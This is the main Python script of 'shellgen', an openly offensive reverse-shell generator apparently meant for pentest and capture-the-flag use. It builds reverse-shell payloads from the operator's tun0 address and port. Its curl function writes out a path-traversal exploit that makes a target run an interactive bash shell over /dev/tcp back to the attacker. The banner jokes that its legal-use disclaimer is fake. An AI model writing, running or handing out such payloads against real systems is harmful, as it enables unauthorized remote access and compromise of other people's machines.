#! /usr/bin/env python3
# -*- coding: utf-8 -*-

# Reverse shell generator based on examples pulled from:
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# This is uses the tun0 IPv4 address. Enter a specific port after calling the script

import sys
import os
import subprocess
from time import sleep
from src.design import print_error, print_info, print_shell, print_shell_types, bcolors, print_list_shells
from src.core import return_shells

# Support between python2 and python3
try: input = raw_input
except: pass

# List of shells available
shells = ["bash","go","nc","curl","netcat","msfvenom","perl","php","python","powershell","ruby","xterm","telnet"]

def create_launcher():
	try:
		"""
		Create a launcher to execute shellgen from the commandline.
		"""
		cwd = os.getcwd()
		filewrite = open("/usr/local/bin/shellgen", "w")
		filewrite.write('#!/bin/sh\ncd %s\nchmod +x shellgen\n./shellgen "$@"' % (cwd))
		filewrite.close()
		subprocess.Popen("chmod +x /usr/local/bin/shellgen", shell=True).wait()
	except Exception as error:
		print_error(error)

# Grab the latest update
def update():
	# force https for git
	def git_https_force():
		subprocess.Popen('git config --global url."https://github.com/".insteadOf git@github.com:;git config --global url."https://".insteadOf git://', shell=True).wait()

	# force https
	git_https_force()

	# try to update ourself first
	print_info("Trying to update myself first... Then will generate the shellcode...")
	subprocess.Popen("git pull", shell=True).wait()
	print_info("Remember, if there was a new update, terminate this session and re-run the script")
	sleep(2)


def banner():
	__version__ = 0.7

	banner = bcolors.DARKGREEN + """
	███████╗██╗  ██╗███████╗██╗     ██╗      ██████╗ ███████╗███╗   ██╗
	██╔════╝██║  ██║██╔════╝██║     ██║     ██╔════╝ ██╔════╝████╗  ██║
	███████╗███████║█████╗  ██║     ██║     ██║  ███╗█████╗  ██╔██╗ ██║
	╚════██║██╔══██║██╔══╝  ██║     ██║     ██║   ██║██╔══╝  ██║╚██╗██║
	███████║██║  ██║███████╗███████╗███████╗╚██████╔╝███████╗██║ ╚████║
	╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝ ╚═════╝ ╚══════╝╚═╝  ╚═══╝
	""" +bcolors.ENDC
	banner += """
	Version: """ + bcolors.YELLOW + str(__version__) + bcolors.DARKGREEN + """\n
	Author: AgentWhite (@__Th3J0k3r__) (github.com/realagentwhite)
	Website: https://thegibson.xyz"""
	banner += """
	Reverse shell generator.
	This is uses the tun0 IPv4 address.\n\tEnter a specific port after calling the script
	"""
	banner += bcolors.RED+ """
	!!!!!! DISCLAIMER !!!!!!
	This tool is developed only for legal purposes.
	Just kidding. Have fun! :-)
	""" + bcolors.ENDC

	return banner

def help_menu():
	print("""
	Reverse shell generator based on examples pulled from:
	https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
	http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet""")
	print("\n\tCommands you can enter in arguments:")
	print("\t-h or --help\t\t This help menu")
	print("\t-u or --update\t\t Run the update and exit")
	print("\t--no-update\t\t Do not update when running")
	print("\t--shells or --list-shells\t Lists all the available shells")
	print("\t-c or --create-launcher\t Creates the launcher to run shellgen from anywhere in the terminal (requires sudo privileges)")
	print("\n\tHow to use shellgen:")
	print_info("Run: %s <LHOST> <LPORT> <SHELL TYPE>" % str(sys.argv[0]))
	sys.exit()


def return_curl_shell():
	target = input("Enter target:~$ "+bcolors.DARKPURPLE);print(bcolors.ENDC)
	rport = input("Enter target port:~$ "+bcolors.DARKPURPLE);print(bcolors.ENDC)
	curl = """curl -s -X POST 'http://"""+target+""":"""+rport+"""/.%0d./.%0d./.%0d./bin/sh' -d '/bin/bash -c "/bin/bash -i >& /dev/tcp/"""+ip+"""/"""+port+""" 0>&1"'"""
	print(bcolors.YELLOW+"[1] "+bcolors.ENDC+curl)

def main():
	try:		
		# Print the IP on tun0 and port we passed in the arguments
		print(bcolors.DARKGREEN + "[*]tun0 IP: " + ip + " port: " + port + bcolors.ENDC)

		print_error("Shell types:")

		for shell in shells:
			print_list_shells(shell)

		print_info("\nThere is also the option for 'all' to print all shells")
		
		print(bcolors.ENDC)
		data = input("Enter the type of shell:~$ "+bcolors.DARKPURPLE).lower()
		print(bcolors.ENDC)
		
		# Since for the curl reverse shell you have to enter a target and it's port, I had to create it apart
		# from the rest of the shell code list
		if data == 'curl':
			return_curl_shell()
		elif data == "msfvenom":
			from src.msfvenompayloads import msfvenom_shells
			return msfvenom_shells(ip, port)
		else:
			pass
		
		return_shells(data, ip, port)

	except KeyboardInterrupt:
		print()
		print_info("Exiting...now")
		sys.exit()

def shellgen():
	global ip, port
	try:
		os.system("clear")
		print(banner())
		
		if not '--no-update' in sys.argv:
			# Call the function to grab latest update
			update()
			os.system("clear")
			print(banner())
		else:
			pass

		if '-h' in sys.argv or '--help' in sys.argv:
			help_menu()
		elif '-u' in sys.argv or '--update' in sys.argv:
			update()
		elif '--shells' in sys.argv or '--list-shells' in sys.argv:
			for i in shells:
				print_shell_types(i)
			sys.exit()	
		elif '-c' in sys.argv or '--create-launcher' in sys.argv:
			print_info("Creating the launcher")
			create_launcher()
			print_info("Launcher has been created.")
			print_info("Now you can run shellgen from anywhere in the terminal")
			sys.exit()
		# If no input from user, print the usage
		elif len(sys.argv) == 1:
			print_info("Usage: %s <LHOST> <LPORT> <SHELL TYPE>" % str(sys.argv[0]))
		# If user inputs port and shell type only
		elif len(sys.argv) == 3:
			ip = os.popen('ip addr show tun0').read().split("inet ")[1].split("/")[0]
			port = sys.argv[1]
			use_shell = sys.argv[2]
			return_shells(use_shell, ip, port)
			#main()
		# If the user inputs the IP to use, port and shellcode to use
		elif len(sys.argv) == 4:
			ip = sys.argv[1]
			port = sys.argv[2]
			use_shell = sys.argv[3]
			# Curl is speciall so this function helps out
			if 'curl' == use_shell:
				return_curl_shell()

			return_shells(use_shell, ip, port)

		elif len(sys.argv) == 2:
			if '.' in sys.argv[-1]:
				print_error("You forgot to add the port wich goes last in the arguments.") 
				sys.exit()
			else:
				# The variable below will get the VPN of the tun0 instead of the user having to enter it
				ip = os.popen('ip addr show tun0').read().split("inet ")[1].split("/")[0]
				port = sys.argv[1]
				main()
		else:
			# The variable below will get the VPN of the tun0 instead of the user having to enter it
			ip = os.popen('ip addr show tun0').read().split("inet ")[1].split("/")[0]
			port = sys.argv[1]
			main()
	except IndexError:
		print_error("Check that you are connected to the VPN\n")
		sys.exit()
	except Exception as error:
		print_error("Darnit! Something happened! Not sure what but will show you")
		print_error(error)
		print_error("Please report this to the developer/s on that strange Github thingy")
		sys.exit()


if __name__ == "__main__":
	shellgen()
